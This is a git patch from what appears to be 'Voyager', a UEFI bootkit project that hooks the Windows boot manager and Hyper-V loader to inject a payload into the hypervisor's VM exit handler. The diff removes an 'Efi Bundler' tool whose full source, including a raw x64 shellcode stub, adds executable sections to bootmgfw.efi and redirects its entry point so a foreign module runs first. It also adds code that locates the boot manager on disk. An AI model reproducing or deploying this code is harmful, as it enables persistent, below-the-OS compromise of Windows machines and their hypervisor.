From 4f46cd8ab3212fbbd9a983f170ebe7ad1d084200 Mon Sep 17 00:00:00 2001 From: xerox Date: Sat, 3 Oct 2020 00:36:48 -0700 Subject: [PATCH] v1.0 done. :) --- Efi Bundler/Efi Bundler.sln | 31 -- Efi Bundler/Efi Bundler.vcxproj | 161 -------- Efi Bundler/Efi Bundler.vcxproj.filters | 35 -- Efi Bundler/Efi Bundler.vcxproj.user | 11 - Efi Bundler/bundler.cpp | 92 ----- Efi Bundler/bundler.h | 15 - Efi Bundler/main.cpp | 38 -- Efi Bundler/shellcode.cpp | 57 --- Efi Bundler/shellcode.h | 76 ---- Efi Bundler/utils.h | 84 ----- Voyager-1/PayLoad/types.h | 4 +- Voyager-1/Voyager-1 (1703-1511)/BootMgfw.c | 43 +++ Voyager-1/Voyager-1 (1703-1511)/BootMgfw.h | 1 + Voyager-1/Voyager-1 (1703-1511)/HvLoader.c | 10 +- Voyager-1/Voyager-1 (1703-1511)/Hvix64.c | 6 +- Voyager-1/Voyager-1 (1703-1511)/Hvix64.h | 4 +- Voyager-1/Voyager-1 (1703-1511)/PayLoad.c | 349 +++++------------- Voyager-1/Voyager-1 (1703-1511)/PayLoad.h | 11 +- Voyager-1/Voyager-1 (1703-1511)/UefiMain.c | 48 ++- Voyager-1/Voyager-1 (1703-1511)/WinLoad.c | 6 - Voyager-1/Voyager-1 (2004-1709)/BootMgfw.c | 47 ++- Voyager-1/Voyager-1 (2004-1709)/BootMgfw.h | 2 + Voyager-1/Voyager-1 (2004-1709)/Hvix64.c | 9 +- Voyager-1/Voyager-1 (2004-1709)/Hvix64.h | 4 +- Voyager-1/Voyager-1 (2004-1709)/PayLoad.c | 349 +++++------------- Voyager-1/Voyager-1 (2004-1709)/PayLoad.h | 11 +- Voyager-1/Voyager-1 (2004-1709)/UefiMain.c | 43 ++- Voyager-1/Voyager-1 (2004-1709)/Utils.h | 2 +- .../Voyager-1 (2004-1709).vcxproj | 6 +- Voyager-1/Voyager-1 (2004-1709)/WinLoad.c | 7 +- Voyager-2/Voyager-2 (1703-1511)/BootMgfw.c | 43 +++ Voyager-2/Voyager-2 (1703-1511)/BootMgfw.h | 1 + Voyager-2/Voyager-2 (1703-1511)/PayLoad.c | 307 +++++---------- Voyager-2/Voyager-2 (1703-1511)/PayLoad.h | 9 +- Voyager-2/Voyager-2 (1703-1511)/UefiMain.c | 47 ++- Voyager-2/Voyager-2 (1703-1511)/WinLoad.c | 2 +- Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c | 43 +++ Voyager-2/Voyager-2 (2004-1709)/BootMgfw.h | 1 + Voyager-2/Voyager-2 (2004-1709)/PayLoad.c | 307 +++++---------- Voyager-2/Voyager-2 (2004-1709)/PayLoad.h | 9 +- Voyager-2/Voyager-2 (2004-1709)/UefiMain.c | 47 ++- launch.bat | 15 + 42 files changed, 752 insertions(+), 1641 deletions(-) delete mode 100644 Efi Bundler/Efi Bundler.sln delete mode 100644 Efi Bundler/Efi Bundler.vcxproj delete mode 100644 Efi Bundler/Efi Bundler.vcxproj.filters delete mode 100644 Efi Bundler/Efi Bundler.vcxproj.user delete mode 100644 Efi Bundler/bundler.cpp delete mode 100644 Efi Bundler/bundler.h delete mode 100644 Efi Bundler/main.cpp delete mode 100644 Efi Bundler/shellcode.cpp delete mode 100644 Efi Bundler/shellcode.h delete mode 100644 Efi Bundler/utils.h create mode 100644 launch.bat diff --git a/Efi Bundler/Efi Bundler.sln b/Efi Bundler/Efi Bundler.sln deleted file mode 100644 index a0f17f7..0000000 --- a/Efi Bundler/Efi Bundler.sln +++ /dev/null @@ -1,31 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 12.00 -# Visual Studio Version 16 -VisualStudioVersion = 16.0.30503.244 -MinimumVisualStudioVersion = 10.0.40219.1 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Efi Bundler", "Efi Bundler.vcxproj", "{EE860038-E3DD-4329-8D44-DF8B9ECBE420}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|x64 = Debug|x64 - Debug|x86 = Debug|x86 - Release|x64 = Release|x64 - Release|x86 = Release|x86 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x64.ActiveCfg = Debug|x64 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x64.Build.0 = Debug|x64 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x86.ActiveCfg = Debug|Win32 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x86.Build.0 = Debug|Win32 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x64.ActiveCfg = Release|x64 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x64.Build.0 = Release|x64 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x86.ActiveCfg = Release|Win32 - {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x86.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection - GlobalSection(ExtensibilityGlobals) = postSolution - SolutionGuid = {6F313696-ED35-4BFB-B825-E3E8861D12E3} - EndGlobalSection -EndGlobal diff --git a/Efi Bundler/Efi Bundler.vcxproj b/Efi Bundler/Efi Bundler.vcxproj deleted file mode 100644 index 399fcff..0000000 --- a/Efi Bundler/Efi Bundler.vcxproj +++ /dev/null @@ -1,161 +0,0 @@ - - - - - Debug - Win32 - - - Release - Win32 - - - Debug - x64 - - - Release - x64 - - - - 16.0 - Win32Proj - {ee860038-e3dd-4329-8d44-df8b9ecbe420} - EfiBundler - 10.0 - - - - Application - true - v142 - Unicode - - - Application - false - v142 - true - Unicode - - - Application - true - v142 - Unicode - - - Application - false - v142 - true - Unicode - - - - - - - - - - - - - - - - - - - - - true - - - false - - - true - - - false - - - - Level3 - true - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - - - - - Level3 - true - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - true - true - - - - - Level3 - true - _DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - stdcpp17 - false - false - - - Console - true - - - - - Level3 - true - true - true - NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - stdcpp17 - false - Disabled - false - - - Console - true - true - true - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/Efi Bundler/Efi Bundler.vcxproj.filters b/Efi Bundler/Efi Bundler.vcxproj.filters deleted file mode 100644 index 4fc8d9a..0000000 --- a/Efi Bundler/Efi Bundler.vcxproj.filters +++ /dev/null @@ -1,35 +0,0 @@ - - - - - {4FC737F1-C7A5-4376-A066-2A32D752A2FF} - cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx - - - {93995380-89BD-4b04-88EB-625FBE52EBFB} - h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd - - - - - Header Files - - - Header Files - - - Header Files - - - - - Source Files - - - Source Files - - - Source Files - - - \ No newline at end of file diff --git a/Efi Bundler/Efi Bundler.vcxproj.user b/Efi Bundler/Efi Bundler.vcxproj.user deleted file mode 100644 index 545fb0f..0000000 --- a/Efi Bundler/Efi Bundler.vcxproj.user +++ /dev/null @@ -1,11 +0,0 @@ - - - - C:\Users\xerox\Desktop\bootmgfw.efi C:\Users\xerox\Desktop\voyager.efi - WindowsLocalDebugger - - - C:\Users\xerox\Desktop\bootmgfw.efi C:\Users\xerox\Desktop\voyager.efi - WindowsLocalDebugger - - \ No newline at end of file diff --git a/Efi Bundler/bundler.cpp b/Efi Bundler/bundler.cpp deleted file mode 100644 index 3d9dc6b..0000000 --- a/Efi Bundler/bundler.cpp +++ /dev/null @@ -1,92 +0,0 @@ -#include "bundler.h" - -namespace bundler -{ - std::pair add_section(std::vector& image, const char* name, std::size_t size, std::uint32_t protect) - { - auto align = [](std::uint32_t size, std::uint32_t align, std::uint32_t addr) -> std::uint32_t - { - if (!(size % align)) - return addr + size; - return addr + (size / align + 1) * align; - }; - - auto section_header = reinterpret_cast( - ((std::uint64_t)&NT_HEADER(image.data())->OptionalHeader) + - NT_HEADER(image.data())->FileHeader.SizeOfOptionalHeader); - - auto new_section = §ion_header[NT_HEADER(image.data())->FileHeader.NumberOfSections]; - memset(new_section, NULL, sizeof(IMAGE_SECTION_HEADER)); - memcpy(new_section->Name, name, 8); - - new_section->Characteristics = protect; - section_header[NT_HEADER(image.data())->FileHeader.NumberOfSections].Misc.VirtualSize = - align(size, NT_HEADER(image.data())->OptionalHeader.SectionAlignment, NULL); - - new_section->VirtualAddress = align(section_header[ - NT_HEADER(image.data())->FileHeader.NumberOfSections - 1].Misc.VirtualSize, - NT_HEADER(image.data())->OptionalHeader.SectionAlignment, section_header[ - NT_HEADER(image.data())->FileHeader.NumberOfSections - 1].VirtualAddress); - - new_section->SizeOfRawData = - align(size, NT_HEADER(image.data())->OptionalHeader.FileAlignment, 0); - - new_section->PointerToRawData = - align(section_header[NT_HEADER(image.data())->FileHeader.NumberOfSections - 1].SizeOfRawData, - NT_HEADER(image.data())->OptionalHeader.FileAlignment, section_header[NT_HEADER(image.data())-> - FileHeader.NumberOfSections - 1].PointerToRawData); - - NT_HEADER(image.data())->OptionalHeader.SizeOfImage = section_header[ - NT_HEADER(image.data())->FileHeader.NumberOfSections].VirtualAddress + - section_header[NT_HEADER(image.data())->FileHeader.NumberOfSections].Misc.VirtualSize; - - ++NT_HEADER(image.data())->FileHeader.NumberOfSections; - auto raw_data_rva = new_section->PointerToRawData; - auto virt_data_rva = new_section->VirtualAddress; - auto raw_data_size = new_section->SizeOfRawData; - - image.resize(raw_data_rva + raw_data_size); - memset(image.data() + raw_data_rva, NULL, raw_data_size); - return { raw_data_rva, virt_data_rva }; - } - - // module_base is .efi section base in this case... - std::uint32_t map_module(std::uint8_t* module_base, std::vector& map_from) - { - // copy nt headers... - memcpy(module_base, map_from.data(), NT_HEADER(map_from.data())->OptionalHeader.SizeOfHeaders); - auto sections = reinterpret_cast( - (std::uint8_t*)&NT_HEADER(map_from.data())->OptionalHeader + - NT_HEADER(map_from.data())->FileHeader.SizeOfOptionalHeader); - - // copy sections... - for (auto i = 0u; i < NT_HEADER(map_from.data())->FileHeader.NumberOfSections; ++i) - { - auto section = §ions[i]; - memcpy(module_base + section->VirtualAddress, map_from.data() + section->PointerToRawData, section->SizeOfRawData); - } - - return NT_HEADER(map_from.data())->OptionalHeader.AddressOfEntryPoint; - } - - void bundle(std::vector& bundle_into, std::vector& bundle_module) - { - auto [trp_section_disk, trp_section_virt] = add_section(bundle_into, ".trp", sizeof shellcode::stub, SECTION_RWX); - auto [mod_section_disk, mod_section_virt] = add_section(bundle_into, ".efi", bundle_module.size(), SECTION_RWX); - bundler::map_module(bundle_into.data() + mod_section_disk, bundle_module); - - std::printf("[+] added .trp section at rva -> 0x%x, size -> 0x%x\n", trp_section_virt, sizeof shellcode::stub); - std::printf("[+] added .efi section at rva -> 0x%x, size -> 0x%x\n", mod_section_virt, bundle_module.size()); - - // setup stub shellcode... - *reinterpret_cast(&shellcode::stub[25]) = mod_section_virt - trp_section_virt; - *reinterpret_cast(&shellcode::stub[45]) = trp_section_virt; - *reinterpret_cast(&shellcode::stub[75]) = NT_HEADER(bundle_into.data())->OptionalHeader.AddressOfEntryPoint; - memcpy(bundle_into.data() + trp_section_disk, shellcode::stub, sizeof shellcode::stub); - std::printf("[+] added stub code to .trp section...\n"); - - // set entry point to .trp section... - NT_HEADER(bundle_into.data())->OptionalHeader.AddressOfEntryPoint = trp_section_virt; - std::printf("[+] changed base modules entry point to -> (.trp section base) 0x%x\n", trp_section_virt); - } -} \ No newline at end of file diff --git a/Efi Bundler/bundler.h b/Efi Bundler/bundler.h deleted file mode 100644 index 986d710..0000000 --- a/Efi Bundler/bundler.h +++ /dev/null @@ -1,15 +0,0 @@ -#pragma once -#include "shellcode.h" -#define SECTION_RWX ((IMAGE_SCN_MEM_WRITE | \ - IMAGE_SCN_CNT_CODE | \ - IMAGE_SCN_CNT_UNINITIALIZED_DATA | \ - IMAGE_SCN_MEM_EXECUTE | \ - IMAGE_SCN_CNT_INITIALIZED_DATA | \ - IMAGE_SCN_MEM_READ)) - -namespace bundler -{ - std::pair add_section(std::vector& image, const char* name, std::size_t size, std::uint32_t protect); - std::uint32_t map_module(std::uint8_t* module_base, std::vector& map_from); - void bundle(std::vector& bundle_into, std::vector& bundle_module); -} diff --git a/Efi Bundler/main.cpp b/Efi Bundler/main.cpp deleted file mode 100644 index 172bff7..0000000 --- a/Efi Bundler/main.cpp +++ /dev/null @@ -1,38 +0,0 @@ -#include "bundler.h" - -int __cdecl main(int argc, char** argv) -{ - if (argc < 2) - { - std::printf("[!] invalid amount of parameters\n"); - return -1; - } - - std::vector efi_module; - std::vector bootmgfw; - - impl::open_binary_file(argv[1], bootmgfw); - impl::open_binary_file(argv[2], efi_module); - - if (efi_module.empty() || bootmgfw.empty()) - { - std::printf("[!] unable to load efi module(s)...\n"); - return -1; - } - - efi_module.resize(NT_HEADER(efi_module.data())->OptionalHeader.SizeOfImage); - std::printf("bundling efi module, size -> 0x%x\n", - NT_HEADER(efi_module.data())->OptionalHeader.SizeOfImage); - - bootmgfw.resize(NT_HEADER(bootmgfw.data())->OptionalHeader.SizeOfImage); - std::printf("bundling module into bootmgfw, size before patch -> 0x%x\n", - NT_HEADER(bootmgfw.data())->OptionalHeader.SizeOfImage); - - bundler::bundle(bootmgfw, efi_module); - std::ofstream new_file("result.efi", std::ios::binary); - new_file.write((char*)bootmgfw.data(), bootmgfw.size()); - new_file.close(); - - std::printf("bundled modules together....\n"); - std::getchar(); -} \ No newline at end of file diff --git a/Efi Bundler/shellcode.cpp b/Efi Bundler/shellcode.cpp deleted file mode 100644 index c1d6626..0000000 --- a/Efi Bundler/shellcode.cpp +++ /dev/null @@ -1,57 +0,0 @@ -#include "shellcode.h" - -namespace shellcode -{ - void* entry_stub(void* a, void* b) - { - // 0xDEADBEEF is replaced at runtime... - auto module_base = reinterpret_cast(&entry_stub) + 0xDEADBEEF; - auto bootmgfw_base = reinterpret_cast(&entry_stub) - 0xDEADBEEF; - NT_HEADER(bootmgfw_base)->OptionalHeader.AddressOfEntryPoint = 0xDEADBEEF; - - // fix relocs of the module in .efi section... - auto base_reloc_dir = &NT_HEADER(module_base)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; - if (base_reloc_dir->VirtualAddress) - { - auto reloc = reinterpret_cast(module_base + base_reloc_dir->VirtualAddress); - for (auto current_size = 0u; current_size < base_reloc_dir->Size; ) - { - std::uint32_t reloc_count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(std::uint16_t); - auto reloc_data = reinterpret_cast((std::uint8_t*)reloc + sizeof(IMAGE_BASE_RELOCATION)); - auto reloc_base = reinterpret_cast(module_base) + reloc->VirtualAddress; - - for (auto i = 0u; i < reloc_count; ++i, ++reloc_data) - { - std::uint16_t data = *reloc_data; - std::uint16_t type = data >> 12; - std::uint16_t offset = data & 0xFFF; - - switch (type) - { - case IMAGE_REL_BASED_ABSOLUTE: - break; - case IMAGE_REL_BASED_DIR64: - { - auto rva = reinterpret_cast(reloc_base + offset); - *rva = module_base + (*rva - NT_HEADER(module_base)->OptionalHeader.ImageBase); - break; - } - default: - break; - } - } - - current_size += reloc->SizeOfBlock; - reloc = reinterpret_cast(reloc_data); - } - } - - // call our entry... - reinterpret_cast( - module_base + NT_HEADER(module_base)->OptionalHeader.AddressOfEntryPoint)(a, b); - - // call the original entry... - return reinterpret_cast( - bootmgfw_base + NT_HEADER(bootmgfw_base)->OptionalHeader.AddressOfEntryPoint)(a, b); - } -} \ No newline at end of file diff --git a/Efi Bundler/shellcode.h b/Efi Bundler/shellcode.h deleted file mode 100644 index ba7d1c1..0000000 --- a/Efi Bundler/shellcode.h +++ /dev/null @@ -1,76 +0,0 @@ -#pragma once -#include -#include -#include "utils.h" - -namespace shellcode -{ - void* entry_stub(void* a, void* b); - // void* entry_stub(void* a, void* b) - // + 75, Real entry point RVA - // + 25, RVA to bundled module base... (gunna be a section base address) - // + 45, RVA to bootmgfw base address... (number is positive, assembly subtracts this number) - inline char stub[] = - { - 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, 0x24, 0x08, - 0x48, 0x81, 0xEC, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x05, - 0xE8, 0xFF, 0xFF, 0xFF, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, - 0x03, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8D, 0x05, - 0xD4, 0xFF, 0xFF, 0xFF, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, - 0x2B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8B, 0x44, - 0x24, 0x48, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, - 0x48, 0xC7, 0x44, 0x01, 0x28, 0xEF, 0xBE, 0xAD, 0xDE, 0x48, - 0x8B, 0x44, 0x24, 0x28, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, - 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0xB9, - 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC9, 0x05, 0x48, 0x8D, - 0x84, 0x08, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, - 0x60, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x83, 0x38, 0x00, 0x0F, - 0x84, 0x4E, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x60, - 0x8B, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, - 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x40, 0xC7, 0x44, - 0x24, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, - 0x60, 0x8B, 0x40, 0x04, 0x39, 0x44, 0x24, 0x3C, 0x0F, 0x83, - 0x1D, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x8B, - 0x40, 0x04, 0x48, 0x83, 0xE8, 0x08, 0x33, 0xD2, 0xB9, 0x02, - 0x00, 0x00, 0x00, 0x48, 0xF7, 0xF1, 0x48, 0x89, 0x44, 0x24, - 0x70, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0x83, 0xC0, 0x08, - 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x40, - 0x8B, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, - 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0xC7, 0x44, - 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x18, 0x8B, 0x44, - 0x24, 0x38, 0xFF, 0xC0, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8B, - 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x02, 0x48, 0x89, 0x44, - 0x24, 0x50, 0x8B, 0x44, 0x24, 0x38, 0x48, 0x3B, 0x44, 0x24, - 0x70, 0x0F, 0x83, 0x89, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, - 0x24, 0x50, 0x0F, 0xB7, 0x00, 0x66, 0x89, 0x44, 0x24, 0x20, - 0x0F, 0xB7, 0x44, 0x24, 0x20, 0xC1, 0xF8, 0x0C, 0x66, 0x89, - 0x44, 0x24, 0x30, 0x0F, 0xB7, 0x44, 0x24, 0x20, 0x25, 0xFF, - 0x0F, 0x00, 0x00, 0x66, 0x89, 0x44, 0x24, 0x34, 0x0F, 0xB7, - 0x44, 0x24, 0x30, 0x89, 0x44, 0x24, 0x58, 0x83, 0x7C, 0x24, - 0x58, 0x0A, 0x74, 0x02, 0xEB, 0x49, 0x0F, 0xB7, 0x44, 0x24, - 0x34, 0x48, 0x8B, 0x4C, 0x24, 0x78, 0x48, 0x03, 0xC8, 0x48, - 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8B, 0x44, - 0x24, 0x28, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, - 0x68, 0x48, 0x8B, 0x54, 0x24, 0x28, 0x48, 0x8B, 0x44, 0x02, - 0x30, 0x48, 0x8B, 0x09, 0x48, 0x2B, 0xC8, 0x48, 0x8B, 0xC1, - 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, - 0xC1, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x89, 0x01, 0xE9, - 0x50, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x8B, - 0x40, 0x04, 0x8B, 0x4C, 0x24, 0x3C, 0x03, 0xC8, 0x8B, 0xC1, - 0x89, 0x44, 0x24, 0x3C, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, - 0x89, 0x44, 0x24, 0x40, 0xE9, 0xD1, 0xFE, 0xFF, 0xFF, 0x48, - 0x8B, 0x44, 0x24, 0x28, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, - 0x4C, 0x24, 0x28, 0x8B, 0x44, 0x01, 0x28, 0x48, 0x8B, 0x4C, - 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, - 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x94, 0x24, - 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, - 0x00, 0x00, 0xFF, 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, - 0x8B, 0x44, 0x24, 0x48, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, - 0x4C, 0x24, 0x48, 0x8B, 0x44, 0x01, 0x28, 0x48, 0x8B, 0x4C, - 0x24, 0x48, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, - 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x94, 0x24, - 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, - 0x00, 0x00, 0xFF, 0x94, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, - 0x81, 0xC4, 0x98, 0x00, 0x00, 0x00, 0xC3 - }; -} \ No newline at end of file diff --git a/Efi Bundler/utils.h b/Efi Bundler/utils.h deleted file mode 100644 index 19f9f1c..0000000 --- a/Efi Bundler/utils.h +++ /dev/null @@ -1,84 +0,0 @@ -#pragma once -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define NT_HEADER(x) reinterpret_cast( std::uint64_t(x) + reinterpret_cast(x)->e_lfanew ) -namespace impl -{ - using uq_handle = std::unique_ptr; - - __forceinline std::uint32_t get_process_id(const std::wstring_view process_name) - { - // open a system snapshot of all loaded processes - uq_handle snap_shot{ CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle }; - - if (snap_shot.get() == INVALID_HANDLE_VALUE) - { - return 0; - } - - PROCESSENTRY32W process_entry{ sizeof(PROCESSENTRY32W) }; - - // enumerate through processes - for (Process32FirstW(snap_shot.get(), &process_entry); Process32NextW(snap_shot.get(), &process_entry); ) - if (std::wcscmp(process_name.data(), process_entry.szExeFile) == 0) - return process_entry.th32ProcessID; - - return 0; - } - - __forceinline void open_binary_file(const std::string& file, std::vector& data) - { - std::ifstream fstr(file, std::ios::binary); - fstr.unsetf(std::ios::skipws); - fstr.seekg(0, std::ios::end); - - const auto file_size = fstr.tellg(); - - fstr.seekg(NULL, std::ios::beg); - data.reserve(static_cast(file_size)); - data.insert(data.begin(), std::istream_iterator(fstr), std::istream_iterator()); - } - - __forceinline bool enable_privilege(const std::wstring_view privilege_name) - { - HANDLE token_handle = nullptr; - if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token_handle)) - {; - return false; - } - - LUID luid{}; - if (!LookupPrivilegeValueW(nullptr, privilege_name.data(), &luid)) - { - return false; - } - - TOKEN_PRIVILEGES token_state{}; - token_state.PrivilegeCount = 1; - token_state.Privileges[0].Luid = luid; - token_state.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - - if (!AdjustTokenPrivileges(token_handle, FALSE, &token_state, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr)) - { - return false; - } - - CloseHandle(token_handle); - - return true; - } -} \ No newline at end of file diff --git a/Voyager-1/PayLoad/types.h b/Voyager-1/PayLoad/types.h index 3a33ba6..c65643e 100644 --- a/Voyager-1/PayLoad/types.h +++ b/Voyager-1/PayLoad/types.h @@ -2,8 +2,9 @@ #include #include #include + #define PORT_NUM 0x2F8 -#define WINVER 2004 +#define WINVER 1511 #define DBG_PRINT(arg) \ __outbytestring(PORT_NUM, (unsigned char*)arg, sizeof arg); @@ -50,5 +51,4 @@ typedef struct _voyager_t uintptr_t record_size; } voyager_t, *pvoyager_t; #pragma pack(pop) - __declspec(dllexport) inline voyager_t voyager_context; \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.c b/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.c index ada0479..e5ad410 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.c +++ b/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.c @@ -131,6 +131,49 @@ EFI_STATUS EFIAPI RestoreBootMgfw(VOID) return EFI_ABORTED; } +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID) +{ + UINTN HandleCount = NULL; + EFI_STATUS Result; + EFI_HANDLE* Handles = NULL; + EFI_DEVICE_PATH* DevicePath = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE BootMgfwHandle; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return DevicePath; + } + + for (UINT32 Idx = 0u; Idx < HandleCount && !FileSystem; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return DevicePath; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return DevicePath; + } + + if (!EFI_ERROR(VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGFW_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY))) + DevicePath = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH); + + VolumeHandle->Close(BootMgfwHandle); + if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL)))) + { + Print(L"error closing protocol -> 0x%p\n", Result); + return DevicePath; + } + } + return DevicePath; +} + EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE ImageHandle) { EFI_STATUS Result = EFI_SUCCESS; diff --git a/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.h b/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.h index 03e1cb7..3764c7f 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.h +++ b/Voyager-1/Voyager-1 (1703-1511)/BootMgfw.h @@ -24,5 +24,6 @@ static_assert(sizeof(START_BOOT_APPLICATION_SIG) == sizeof(START_BOOT_APPLICATIO extern SHITHOOK BootMgfwShitHook; typedef EFI_STATUS(EFIAPI* IMG_ARCH_START_BOOT_APPLICATION)(VOID*, VOID*, UINT32, UINT8, VOID*); EFI_STATUS EFIAPI RestoreBootMgfw(VOID); +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID); EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE ImageHandle); EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs); diff --git a/Voyager-1/Voyager-1 (1703-1511)/HvLoader.c b/Voyager-1/Voyager-1 (1703-1511)/HvLoader.c index 243b2ba..946421c 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/HvLoader.c +++ b/Voyager-1/Voyager-1 (1703-1511)/HvLoader.c @@ -33,7 +33,7 @@ EFI_STATUS EFIAPI HvBlImgLoadPEImageFromSourceBuffer(VOID* a1, VOID* a2, VOID* a { if (!AsciiStrCmp(&pSection->Name, ".reloc")) { - voyager_t VoyagerData; + VOYAGER_T VoyagerData; MakeVoyagerData ( &VoyagerData, @@ -54,6 +54,9 @@ EFI_STATUS EFIAPI HvBlImgLoadPEImageFromSourceBuffer(VOID* a1, VOID* a2, VOID* a VmExitHook ); + gBS->SetMem(PayLoad, sizeof PayLoad, NULL); + gBS->FreePool(PayLoad); + pSection->Characteristics = SECTION_RWX; pSection->Misc.VirtualSize += PayLoadSize(); 